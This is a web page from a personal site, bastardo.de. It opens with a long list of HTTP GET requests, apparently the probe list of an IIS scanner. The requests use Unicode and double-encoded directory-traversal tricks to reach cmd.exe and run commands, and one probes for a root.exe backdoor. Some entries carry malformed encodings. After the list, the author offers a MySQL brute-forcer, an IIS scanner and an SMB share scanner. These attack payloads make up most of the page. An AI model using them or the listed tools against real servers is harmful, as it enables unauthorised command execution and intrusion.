GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir
GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

 

Home

Hello and Welcome to bastardo.de

i have changed the design a little bit to a blog, it is easier to maintainace.

How ever ;) you can find here Sourcecodes and maybe some Information’s in the future about some little scripts i wrote also some tips for Administration
Hope you enjoy this site and have fun with my programs, if you find a code error don’t hesitate and write a comment.

At the moment i will list
MySQL Bruteforce for Linux and Windows
IISscan for Linux (Written in early 2000 for testing purposes )
SmbScan for Linux (Samba/Netbios scanner for large networks, to find free shares in the local network)

you can find also informations about programming on my partner Site http://code-reference.com
a library about Programming